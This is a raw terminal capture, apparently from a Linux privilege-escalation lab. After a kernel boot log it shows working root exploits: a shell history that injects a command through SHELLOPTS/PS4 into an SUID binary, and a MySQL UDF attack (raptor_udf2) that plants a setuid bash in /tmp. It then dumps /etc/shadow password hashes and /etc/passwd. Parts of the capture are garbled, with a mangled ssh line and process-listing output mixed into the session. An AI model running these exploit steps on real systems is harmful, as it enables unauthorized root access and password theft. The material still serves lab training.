1608Jan 17 19:55:44 debian kernel: [ 0.000000] Checking aperture...
1609Jan 17 19:55:44 debian kernel: [ 0.000000] No AGP bridge found
1610Jan 17 19:55:44 debian kernel: [ 0.000000] Memory: 497460k/524288k available (3087k kernel code, 392k absent, 26436k reserved, 2036k data, 592k init)
1611Jan 17 19:55:44 debian kernel: [ 0.000000] SLUB: Genslabs=14, HWalign=64, Order=0-3, MinObjects=0, CPUs=15, Nodes=1
1612Jan 17 19:55:44 debian kernel: [ 0.000000] Hierarchical RCU implementation.
1613Jan 17 19:55:44 debian kernel: [ 0.000000] NR_IRQS:4352 nr_irqs:936
1614Jan 17 19:55:44 debian kernel: [ 0.000000] Xen HVM callback vector for event delivery is enabled
1615Jan 17 19:55:44 debian kernel: [ 0.000000] Console: colour VGA+ 80x25
1616Jan 17 19:55:44 debian kernel: [ 0.000000] console [ttyS0] enabled
1617Jan 17 19:55:44 debian kernel: [ 0.000000] Detected 2400.068 MHz processor.
1618Jan 17 19:55:44 debian kernel: [ 0.008000] Calibrating delay loop (skipped), value calculated using timer frequency.. 4800.13 BogoMIPS (lpj=9600272)
1619Jan 17 19:55:44 debian kernel: [ 0.008000] Security Framework initialized
1620Jan 17 19:55:44 debian kernel: [ 0.008000] SELinux: Disabled at boot.
1621Jan 17 19:55:44 debian kernel: [ 0.008000] Dentry cache hash table entries: 65536 (order: 7, 524288 bytes)
1622Jan 17 19:55:44 debian kernel: [ 0.008000] Inode-cache hash table entries: 32768 (order: 6, 262144 bytes)
1623Jan 17 19:55:44 debian kernel: [ 0.008000] Mount-cache hash table entries: 256
1624Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys ns
1625Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys cpuacct
1626Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys devices
1627Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys freezer
1628Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys net_cls
1629Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1630Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1631Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1632Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L3 cache: 30720K
1633Jan 17 19:55:44 debian kernel: [ 0.008000] CPU 0/0x0 -> Node 0
1634Jan 17 19:55:44 debian kernel: [ 0.008000] mce: CPU supports 2 MCE banks
1635Jan 17 19:55:44 debian kernel: [ 0.008000] Performance Events: unsupported p6 CPU model 63 no PMU driver, software events only.
1636Jan 17 19:55:44 debian kernel: [ 0.008000] SMP alternatives: switching to UP code
1637Jan 17 19:55:44 debian kernel: [ 0.024870] ACPI: Core revision 20090903
1638Jan 17 19:55:44 debian kernel: [ 0.027609] Not enabling x2apic, Intr-remapping init failed.
1639Jan 17 19:55:44 debian kernel: [ 0.027611] Setting APIC routing to physical flat
1640Jan 17 19:55:44 debian kernel: [ 0.028367] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=0 pin2=0
1641Jan 17 19:55:44 debian kernel: [ 0.132003] CPU0: Intel(R) Xeon(R) CPU E5-2676 v3 @ 2.40GHz stepping 02
1642Jan 17 19:55:44 debian kernel: [ 0.132019] installing Xen timer for CPU 0
1643Jan 17 19:55:44 debian kernel: [ 0.132127] Brought up 1 CPUs
1644Jan 17 19:55:44 debian kernel: [ 0.132129] Total of 1 processors activated (4800.13 BogoMIPS).
1645Jan 17 19:55:44 debian kernel: [ 0.132599] devtmpfs: initialized
1646Jan 17 19:55:44 debian kernel: [ 0.134154] regulator: core version 0.5
1647Jan 17 19:55:44 debian kernel: [ 0.134187] NET: Registered protocol family 16
1648Jan 17 19:55:44 debian kernel: [ 0.134277] ACPI: bus type pci registered
1649Jan 17 19:55:44 debian kernel: [ 0.134781] PCI: Using configuration type 1 for base access
1650Jan 17 19:55:44 debian kernel: [ 0.134964] bio: create slab <bio-0> at 0
1651Jan 17 19:55:44 debian kernel: [ 0.180504] ACPI: Interpreter enabled
1652Jan 17 19:55:44 debian kernel: [ 0.180506] ACPI: (supports S0 S3 S4 S5)
1653Jan 17 19:55:44 debian kernel: [ 0.180517] ACPI: Using IOAPIC for interrupt routing
1654Jan 17 19:55:44 debian kernel: [ 0.264015] ACPI: No dock devices found.
1655Jan 17 19:55:44 debian kernel: [ 0.264190] ACPI: PCI Root Bridge [PCI0] (0000:00)
1656Jan 17 19:55:44 debian kernel: [ 0.270647] * Found PM-Timer Bug on the chipset. Due to workarounds for a bug,
1657Jan 17 19:55:44 debian kernel: [ 0.270648] * this clock source is slow. Consider trying other clock sources
1658Jan 17 19:55:44 debian kernel: [ 0.272151] pci 0000:00:01.3: quirk: region b000-b03f claimed by PIIX4 ACPI
1659Jan 17 19:55:44 debian kernel: [ 0.535472] ACPI: PCI Interrupt Link [LNKA] (IRQs *5 10 11)
1660Jan 17 19:55:44 debian kernel: [ 0.535913] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 *10 11)
1661Jan 17 19:55:44 debian kernel: [ 0.536298] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 10 *11)
1662Jan 17 19:55:44 debian kernel: [ 0.536733] ACPI: PCI Interrupt Link [LNKD] (IRQs *5 10 11)
1663Jan 17 19:55:44 debian kernel: [ 0.537047] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none
1664Jan 17 19:55:44 debian kernel: [ 0.537049] vgaarb: loaded
1665Jan 17 19:55:44 debian kernel: [ 0.537091] PCI: Using ACPI for IRQ routing
1666Jan 17 19:55:44 debian kernel: [ 0.537927] HPET: 3 timers in total, 0 timers will be used for per-cpu timer
1667Jan 17 19:55:44 debian kernel: [ 0.537942] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0
1668Jan 17 19:55:44 debian kernel: [ 0.537944] hpet0: 3 comparators, 64-bit 62.500000 MHz counter
1669Jan 17 19:55:44 debian kernel: [ 0.544013] Switching to clocksource xen
1670Jan 17 19:55:44 debian kernel: [ 0.544701] pnp: PnP ACPI init
1671Jan 17 19:55:44 debian kernel: [ 0.544706] ACPI: bus type pnp registered
1672Jan 17 19:55:44 debian kernel: [ 0.616781] pnp: PnP ACPI: found 12 devices
1673Jan 17 19:55:44 debian kernel: [ 0.616783] ACPI: ACPI bus type pnp unregistered
1674Jan 17 19:55:44 debian kernel: [ 0.616790] system 00:00: iomem range 0x0-0x9ffff could not be reserved
1675Jan 17 19:55:44 debian kernel: [ 0.616794] system 00:03: ioport range 0x8a0-0x8a3 has been reserved
1676Jan 17 19:55:44 debian kernel: [ 0.616795] system 00:03: ioport range 0xcc0-0xccf has been reserved
1677Jan 17 19:55:44 debian kernel: [ 0.616797] system 00:03: ioport range 0x4d0-0x4d1 has been reserved
1678Jan 17 19:55:44 debian kernel: [ 0.616801] system 00:0b: ioport range 0x10c0-0x1141 has been reserved
1679Jan 17 19:55:44 debian kernel: [ 0.616802] system 00:0b: ioport range 0xb044-0xb047 has been reserved
1680Jan 17 19:55:44 debian kernel: [ 0.629103] NET: Registered protocol family 2
1681Jan 17 19:55:44 debian kernel: [ 0.629154] IP route cache hash table entries: 4096 (order: 3, 32768 bytes)
1682Jan 17 19:55:44 debian kernel: [ 0.629278] TCP established hash table entries: 16384 (order: 6, 262144 bytes)
1683Jan 17 19:55:44 debian kernel: [ 0.629319] TCP bind hash table entries: 16384 (order: 6, 262144 bytes)
1684Jan 17 19:55:44 debian kernel: [ 0.629351] TCP: Hash tables configured (established 16384 bind 16384)
1685Jan 17 19:55:44 debian kernel: [ 0.629352] TCP reno registered
1686Jan 17 19:55:44 debian kernel: [ 0.629438] NET: Registered protocol family 1
1687Jan 17 19:55:44 debian kernel: [ 0.629446] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
1688Jan 17 19:55:44 debian kernel: [ 0.629540] pci 0000:00:01.0: PIIX3: Enabling Passive Release
1689Jan 17 19:55:44 debian kernel: [ 0.629605] pci 0000:00:01.0: Activating ISA DMA hang workarounds
1690Jan 17 19:55:44 debian kernel: [ 0.629702] Unpacking initramfs...
1691Jan 17 19:55:44 debian kernel: [ 1.002144] Freeing initrd memory: 9114k freed
1692Jan 17 19:55:44 debian kernel: [ 1.004042] audit: initializing netlink socket (disabled)
1693Jan 17 19:55:44 debian kernel: [ 1.004049] type=2000 audit(1610931219.820:1): initialized
1694Jan 17 19:55:44 debian kernel: [ 1.022606] HugeTLB registered 2 MB page size, pre-allocated 0 pages
1695Jan 17 19:55:44 debian kernel: [ 1.023264] VFS: Disk quotas dquot_6.5.2
1696Jan 17 19:55:44 debian kernel: [ 1.023291] Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
1697Jan 17 19:55:44 debian kernel: [ 1.023338] msgmni has been set to 989
1698Jan 17 19:55:44 debian kernel: [ 1.023438] alg: No test for stdrng (krng)
1699Jan 17 19:55:44 debian kernel: [ 1.023465] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 253)
1700Jan 17 19:55:44 debian kernel: [ 1.023466] io scheduler noop registered
1701Jan 17 19:55:44 debian kernel: [ 1.023467] io scheduler anticipatory registered
1702Jan 17 19:55:44 debian kernel: [ 1.023468] io scheduler deadline registered
1703Jan 17 19:55:44 debian kernel: [ 1.023502] io scheduler cfq registered (default)
1704Jan 17 19:55:44 debian kernel: [ 1.023726] xen-platform-pci 0000:00:03.0: PCI INT A -> GSI 28 (level, low) -> IRQ 28
1705Jan 17 19:55:44 debian kernel: [ 1.023752] Grant table initialized
1706Jan 17 19:55:44 debian kernel: [ 1.025195] Linux agpgart interface v0.103
1707Jan 17 19:55:44 debian kernel: [ 1.025212] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
1708Jan 17 19:55:44 debian kernel: [ 1.026935] serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1709Jan 17 19:55:44 debian kernel: [ 1.029317] 00:0a: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1710Jan 17 19:55:44 debian kernel: [ 1.029436] input: Macintosh mouse button emulation as /devices/virtual/input/input0
1711Jan 17 19:55:44 debian kernel: [ 1.029494] PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12
1712Jan 17 19:55:44 debian kernel: [ 1.032600] serio: i8042 KBD port at 0x60,0x64 irq 1
1713Jan 17 19:55:44 debian kernel: [ 1.032603] serio: i8042 AUX port at 0x60,0x64 irq 12
1714Jan 17 19:55:44 debian kernel: [ 1.032657] mice: PS/2 mouse device common for all mice
1715Jan 17 19:55:44 debian kernel: [ 1.033794] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1
1716Jan 17 19:55:44 debian kernel: [ 1.034500] rtc_cmos 00:05: rtc core: registered rtc_cmos as rtc0
1717Jan 17 19:55:44 debian kernel: [ 1.034576] rtc0: alarms up to one day, 114 bytes nvram, hpet irqs
1718Jan 17 19:55:44 debian kernel: [ 1.034582] cpuidle: using governor ladder
1719Jan 17 19:55:44 debian kernel: [ 1.034583] cpuidle: using governor menu
1720Jan 17 19:55:44 debian kernel: [ 1.034586] No iBFT detected.
1721Jan 17 19:55:44 debian kernel: [ 1.034763] TCP cubic registered
1722Jan 17 19:55:44 debian kernel: [ 1.034827] NET: Registered protocol family 10
1723Jan 17 19:55:44 debian kernel: [ 1.035237] Mobile IPv6
1724Jan 17 19:55:44 debian kernel: [ 1.035239] NET: Registered protocol family 17
1725Jan 17 19:55:44 debian kernel: [ 1.035282] registered taskstats version 1
1726Jan 17 19:55:44 debian kernel: [ 1.036085] XENBUS: Device with no driver: device/vbd/768
1727Jan 17 19:55:44 debian kernel: [ 1.036087] XENBUS: Device with no driver: device/vbd/51824
1728Jan 17 19:55:44 debian kernel: [ 1.036087] XENBUS: Device with no driver: device/vif/0
1729Jan 17 19:55:44 debian kernel: [ 1.036088] XENBUS: Device with no driver: device/console/0
1730Jan 17 19:55:44 debian kernel: [ 1.036118] rtc_cmos 00:05: setting system clock to 2021-01-18 00:53:39 UTC (1610931219)
1731Jan 17 19:55:44 debian kernel: [ 1.036138] Initalizing network drop monitor service
1732Jan 17 19:55:44 debian kernel: [ 1.036154] Freeing unused kernel memory: 592k freed
1733Jan 17 19:55:44 debian kernel: [ 1.036268] Write protecting the kernel read-only data: 4236k
1734Jan 17 19:55:44 debian kernel: [ 1.062605] udev[48]: starting version 164
1735Jan 17 19:55:44 debian kernel: [ 1.209990] SCSI subsystem initialized
1736Jan 17 19:55:44 debian kernel: [ 1.239423] FDC 0 is a S82078B
1737Jan 17 19:55:44 debian kernel: [ 1.239452] Initialising Xen virtual ethernet driver.
1738Jan 17 19:55:44 debian kernel: [ 1.243025] scsi0 : ata_piix
1739Jan 17 19:55:44 debian kernel: [ 1.243138] scsi1 : ata_piix
1740Jan 17 19:55:44 debian kernel: [ 1.243166] ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc100 irq 14
1741Jan 17 19:55:44 debian kernel: [ 1.243167] ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc108 irq 15
1742Jan 17 19:55:44 debian kernel: [ 1.261421] xvda: xvda1 xvda2 < xvda5 >
1743Jan 17 19:55:44 debian kernel: [ 1.276068] xvdh: unknown partition table
1744Jan 17 19:55:44 debian kernel: [ 1.740246] PM: Starting manual resume from disk
1745Jan 17 19:55:44 debian kernel: [ 1.931552] kjournald starting. Commit interval 5 seconds
1746Jan 17 19:55:44 debian kernel: [ 1.931560] EXT3-fs: mounted filesystem with ordered data mode.
1747Jan 17 19:55:44 debian kernel: [ 5.842738] udev[275]: starting version 164
1748Jan 17 19:55:44 debian kernel: [ 6.710516] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input2
1749Jan 17 19:55:44 debian kernel: [ 6.710521] ACPI: Power Button [PWRF]
1750Jan 17 19:55:44 debian kernel: [ 6.710556] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input3
1751Jan 17 19:55:44 debian kernel: [ 6.710559] ACPI: Sleep Button [SLPF]
1752Jan 17 19:55:44 debian kernel: [ 6.710873] input: PC Speaker as /devices/platform/pcspkr/input/input4
1753Jan 17 19:55:44 debian kernel: [ 7.873021] processor LNXCPU:00: registered as cooling_device0
1754Jan 17 19:55:44 debian kernel: [ 8.910449] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input5
1755Jan 17 19:55:44 debian kernel: [ 12.712237] Adding 901112k swap on /dev/xvda5. Priority:-1 extents:1 across:901112k SS
1756Jan 17 19:55:44 debian kernel: [ 109.414393] EXT3 FS on xvda1, internal journal
1757Jan 17 19:55:44 debian kernel: [ 110.118130] loop: module loaded
1758Jan 17 19:55:44 debian kernel: [ 110.283292] sys_init_module: 'fexec'->init suspiciously returned 529170432, it should follow 0/-E convention
1759Jan 17 19:55:44 debian kernel: [ 110.283293] sys_init_module: loading module anyway...
1760Jan 17 19:55:44 debian kernel: [ 110.283296] Pid: 934, comm: modprobe Not tainted 2.6.32-5-amd64 #1
1761Jan 17 19:55:44 debian kernel: [ 110.283297] Call Trace:
1762Jan 17 19:55:44 debian kernel: [ 110.283303] [<ffffffff8107aec3>] ? sys_init_module+0x158/0x21a
1763Jan 17 19:55:44 debian kernel: [ 110.283306] [<ffffffff81010b42>] ? system_call_fastpath+0x16/0x1b
1764Jan 17 19:55:44 debian kernel: [ 116.943575] RPC: Registered udp transport module.
1765Jan 17 19:55:44 debian kernel: [ 116.943577] RPC: Registered tcp transport module.
1766Jan 17 19:55:44 debian kernel: [ 116.943578] RPC: Registered tcp NFSv4.1 backchannel transport module.
1767Jan 17 19:55:44 debian kernel: [ 117.026375] Slow work thread pool: Starting up
1768Jan 17 19:55:44 debian kernel: [ 117.026397] Slow work thread pool: Ready
1769Jan 17 19:55:44 debian kernel: [ 117.026419] FS-Cache: Loaded
1770Jan 17 19:55:44 debian kernel: [ 117.201005] FS-Cache: Netfs 'nfs' registered for caching
1771Jan 17 19:55:44 debian kernel: [ 117.326456] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
1772Jan 17 19:55:48 debian kernel: [ 130.271583] svc: failed to register lockdv1 RPC service (errno 97).
1773Jan 17 19:55:48 debian kernel: [ 130.272088] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
1774Jan 17 19:55:48 debian kernel: [ 130.272101] NFSD: starting 90-second grace period
1775rootbash-4.1# history | tail -100
1776 115 ls
1777 116 cat /etc/hosts.allow
1778 117 arp -A
1779 118 arp
1780 119 arp -vpn
1781 120 arp -vn
1782 121 netstat -A
1783 122 netstat -r
1784 123 netstat -i
1785 124 netstat -g
1786 125 netstat -e
1787 126 netstat -l
1788 127 netstat
1789 128 man netstat
1790 129 netstat -tcp
1791 130 netstat -udp
1792 131 netstat -p tcp
1793 132 netstat -p udp
1794 133 netstat -p tcp 22
1795 134 netstat -p 22
1796 135 netstat -p 80
1797 136 netstat -p tcp
1798 137 netstat -p udp
1799 138 ls
1800 139 clear
1801 140 dmesg | grep /var/log
1802 141 dmesg | grep /var/log/messages.log
1803 142 cd /var/log
1804 143 ls
1805 144 dmesg | grep /var/log/syslog | less
1806 145 dmesg | grep /var/log/syslog | more
1807 146 dmesg | grep /var/log/syslog
1808 147 ls -la /var/log/syslog
1809 148 chmod 755 /var/log/syslog
1810 149 ls -la /var/log/syslog
1811 150 ls
1812 151 tail -f /var/log/syslog
1813 152 tail -f /var/log/syslog | more
1814 153 dmesg | grep /var/log/syslog > w0rd.txt
1815 154 cat w0rd.txt
1816 155 ls
1817 156 chmod 755 w0rd.txt
1818 157 ls
1819 158 cat w0rd.txt
1820 159 ls -la w0rd.txt
1821 160 rm -f w0rd.txt
1822 161 ls
1823 162 cat /var/log/syslog
1824 163 cat /var/log/syslog | less foo.txt
1825 164 cat /var/log/syslog | grep /usr/local/bin
1826 165 cat /var/log/syslog | grep /tmp
1827 166 cat /var/log/syslog | grep /rootbash
1828 167 ls
1829 168 cat /var/log/syslog
1830 169 ls
1831 170 dmesg /var/log/auth.log.2.gz
1832 171 cat /var/log/wtmp
1833 172 cat /var/run/utmp
1834 173 who am i
1835 174 users
1836 175 last
1837 176 finger
1838 177 cat /var/log/secure
1839 178 cat /var/log/auth.log
1840 179 head -5 /var/log/auth.log
1841 180 fc -l -10
1842 181 nano .bash_history
1843 182 history 100
1844 183 ls -la
1845 184 who am i
1846 185 cd /
1847 186 ls
1848 187 cd /home
1849 188 ls
1850 189 cd user/
1851 190 ls
1852 191 cd ..
1853 192 ls
1854 193 cat /etc/passwd
1855 194 cat /etc/shadow
1856 195 exit
1857 196 /usr/local/bin/suid-env2
1858 197 env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
1859 198 /tmp/rootbash -p
1860 199 exit
1861 200 cls
1862 201 exit
1863 202 ls
1864 203 cd tools
1865 204 ls
1866 205 /tmp/rootbash -p
1867 206 exit
1868 207 su newroot
1869 208 whoami
1870 209 cat /etc/passwd
1871 210 su root
1872 211 exit
1873 212 tail -f /var/log/messages
1874 213 cat /var/log/messages
1875 214 history | tail -100
1876rootbash-4.1# id
1877uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
1878rootbash-4.1# whoami
1879root
1880rootbash-4.1# ls -la /home/user/bmillakid
1881rootbash-4.1# cd /home
1882rootbash-4.1# ls
1883user
1884rootbash-4.1# cd user
1885rootbash-4.1# ls
1886l33t.txt myvpn.ovpn tools
1887rootbash-4.1#
1888
1889
1890$ ssh user@10.10.170.166
1891$ 6 22 [-E log_file] user@10.10.170.166's configfile] [-I pkcs11]
1892password:
1893Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
1894
1895The programs included with the Debian GNU/Linux system are free software;
1896the exact distribution terms for each program are described in the
1897individual files in /usr/share/doc/*/copyright.
1898
1899Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
1900permitted by applicable law.
1901Last login: Fri May 15 06:41:23 2020 from 192.168.1.125
1902user@debian:~$ id
1903uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plug
1904dev)
1905user@debian:~$ ls
1906myvpn.ovpn tools
1907user@debian:~$ cd tools/
1908user@debian:~/tools$ ls
1909kernel-exploits mysql-udf nginx privesc-scripts sudo suid
1910user@debian:~/tools$ cd mysql-udf/
1911user@debian:~/tools/mysql-udf$ ls
1912raptor_udf2.c
1913user@debian:~/tools/mysql-udf$ gcc -g -c raptor_udf2.c -fPIC
1914user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o raptor_udf2.so raptor_udf2
1915.o -lc
1916top - 20:04:48 up 11 min, 1 user, load average: 0.00, 0.07, 0.08
1917Tasks: 83 total, 1 running, 82 sleeping, 0 stopped, 0 zombie
1918Cpu(s): 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
1919Mem: 507168k total, 498240k used, 8928k free, 382220k buffers
1920Swap: 901112k total, 0k used, 901112k free, 54236k cached
1921
1922 PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1923 1 root 20 0 8396 812 680 S 0.0 0.2 0:01.06 init
1924 2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd
1925 3 root RT 0 0 0 0 S 0.0 0.0 0:00.00 migration/0
1926 4 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ksoftirqd/0
1927 5 root RT 0 0 0 0 S 0.0 0.0 0:00.00 watchdog/0
1928 6 root 20 0 0 0 0 S 0.0 0.0 0:00.01 events/0
1929 7 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuset
1930 8 root 20 0 0 0 0 S 0.0 0.0 0:00.00 khelper
1931 9 root 20 0 0 0 0 S 0.0 0.0 0:00.00 netns
1932 10 root 20 0 0 0 0 S 0.0 0.0 0:00.00 async/mgr
1933 11 root 20 0 0 0 0 S 0.0 0.0 0:00.00 pm
1934 12 root 20 0 0 0 0 S 0.0 0.0 0:00.00 xenwatch
1935 13 root 20 0 0 0 0 S 0.0 0.0 0:00.00 xenbus
1936 14 root 20 0 0 0 0 S 0.0 0.0 0:00.00 sync_supers
1937 15 root 20 0 0 0 0 S 0.0 0.0 0:00.00 bdi-default
1938 16 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kintegrityd/0
1939 17 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kblockd/0
1940 18 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpid
1941 19 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpi_notify
1942 20 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpi_hotplug
1943 21 root 20 0 0 0 0 S 0.0 0.0 0:00.06 kseriod
1944 23 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kondemand/0
1945 24 root 20 0 0 0 0 S 0.0 0.0 0:00.00 khungtaskd
1946 25 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kswapd0
1947 26 root 25 5 0 0 0 S 0.0 0.0 0:00.00 ksmd
1948 27 root 20 0 0 0 0 S 0.0 0.0 0:00.00 aio/0
1949 28 root 20 0 0 0 0 S 0.0 0.0 0:00.00 crypto/0
1950 165 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ata/0
1951 166 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ata_aux
1952 167 root 20 0 0 0 0 S 0.0 0.0 0:00.00 scsi_eh_0
1953 168 root 20 0 0 0 0 S 0.0 0.0 0:00.01 scsi_eh_1
1954 198 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kjournald
1955 240 root 20 0 0 0 0 S 0.0 0.0 0:00.00 flush-202:0
1956 275 root 16 -4 16784 796 380 S 0.0 0.2 0:00.34 udevd
1957 425 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kpsmoused
1958 932 root 18 -2 16780 720 308 S 0.0 0.1 0:00.00 udevd
1959 933 root 18 -2 16780 648 236 S 0.0 0.1 0:00.00 udevd
1960 1249 root 20 0 6796 756 284 S 0.0 0.1 0:00.03 dhclient
1961 1279 daemon 20 0 8136 532 408 S 0.0 0.1 0:00.00 portmap
1962 1311 statd 20 0 14424 896 732 S 0.0 0.2 0:00.00 rpc.statd
1963 1314 root 20 0 0 0 0 S 0.0 0.0 0:00.00 rpciod/0
1964 1316 root 15 -5 0 0 0 S 0.0 0.0 0:00.00 kslowd000
1965 1317 root 15 -5 0 0 0 S 0.0 0.0 0:00.00 kslowd001
1966 1318 root 20 0 0 0 0 S 0.0 0.0 0:00.00 nfsiod
1967 1325 root 20 0 27064 588 372 S 0.0 0.1 0:00.00 rpc.idmapd
1968 1562 root 20 0 54336 1656 1084 S 0.0 0.3 0:00.08 rsyslogd
1969 1638 root 20 0 3960 644 504 S 0.0 0.1 0:00.00 acpid
1970 1672 root 20 0 71424 2896 1476 S 0.0 0.6 0:00.01 apache2
1971 1675 www-data 20 0 71156 1992 596 S 0.0 0.4 0:00.00 apache2
1972 1676 www-data 20 0 287m 2628 984 S 0.0 0.5 0:00.00 apache2
1973 1677 www-data 20 0 287m 2644 996 S 0.0 0.5 0:00.00 apache2
1974 1818 root 20 0 22468 1068 824 S 0.0 0.2 0:00.00 cron
1975user@debian:~/tools/mysql-udf$ use mysql;
1976-bash: use: command not found
1977user@debian:~/tools/mysql-udf$ mysql -u root
1978Welcome to the MySQL monitor. Commands end with ; or \g.
1979Your MySQL connection id is 36
1980Server version: 5.1.73-1+deb6u1 (Debian)
1981
1982Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
1983
1984Oracle is a registered trademark of Oracle Corporation and/or its
1985affiliates. Other names may be trademarks of their respective
1986owners.
1987
1988Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
1989
1990mysql> use mysql;
1991Reading table information for completion of table and column names
1992You can turn off this feature to get a quicker startup with -A
1993
1994Database changed
1995mysql> create table foo(line blob);
1996Query OK, 0 rows affected (0.00 sec)
1997
1998mysql> insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
1999Query OK, 1 row affected (0.00 sec)
2000
2001mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
2002Query OK, 1 row affected (0.00 sec)
2003
2004mysql> create function do_system returns integer soname 'raptor_udf2.so';
2005Query OK, 0 rows affected (0.00 sec)
2006
2007mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
2008+------------------------------------------------------------------+
2009| do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash') |
2010+------------------------------------------------------------------+
2011| 0 |
2012+------------------------------------------------------------------+
20131 row in set (0.00 sec)
2014
2015mysql> /q
2016 -> exit
2017 -> /quit
2018 -> ^CCtrl-C -- exit!
2019Aborted
2020user@debian:~/tools/mysql-udf$ /tmp/rootbash -p
2021rootbash-4.1# id
2022uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30
2023(dip),44(video),46(plugdev),1000(user)
2024rootbash-4.1# cat /etc/shadow
2025root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:
202617298:0:99999:7:::
2027daemon:*:17298:0:99999:7:::
2028bin:*:17298:0:99999:7:::
2029sys:*:17298:0:99999:7:::
2030sync:*:17298:0:99999:7:::
2031games:*:17298:0:99999:7:::
2032man:*:17298:0:99999:7:::
2033lp:*:17298:0:99999:7:::
2034mail:*:17298:0:99999:7:::
2035news:*:17298:0:99999:7:::
2036uucp:*:17298:0:99999:7:::
2037proxy:*:17298:0:99999:7:::
2038www-data:*:17298:0:99999:7:::
2039backup:*:17298:0:99999:7:::
2040list:*:17298:0:99999:7:::
2041irc:*:17298:0:99999:7:::
2042gnats:*:17298:0:99999:7:::
2043nobody:*:17298:0:99999:7:::
2044libuuid:!:17298:0:99999:7:::
2045Debian-exim:!:17298:0:99999:7:::
2046sshd:*:17298:0:99999:7:::
2047user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:
204817298:0:99999:7:::
2049statd:*:17299:0:99999:7:::
2050mysql:!:18133:0:99999:7:::
2051rootbash-4.1# cat /etc/passwd
2052root:x:0:0:root:/root:/bin/bash
2053daemon:x:1:1:daemon:/usr/sbin:/bin/sh
2054bin:x:2:2:bin:/bin:/bin/sh
2055sys:x:3:3:sys:/dev:/bin/sh
2056sync:x:4:65534:sync:/bin:/bin/sync
2057games:x:5:60:games:/usr/games:/bin/sh
2058man:x:6:12:man:/var/cache/man:/bin/sh
2059lp:x:7:7:lp:/var/spool/lpd:/bin/sh
2060mail:x:8:8:mail:/var/mail:/bin/sh
2061news:x:9:9:news:/var/spool/news:/bin/sh
2062uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
2063proxy:x:13:13:proxy:/bin:/bin/sh
2064www-data:x:33:33:www-data:/var/www:/bin/sh
2065backup:x:34:34:backup:/var/backups:/bin/sh
2066list:x:38:38:Mailing List Manager:/var/list:/bin/sh
2067irc:x:39:39:ircd:/var/run/ircd:/bin/sh
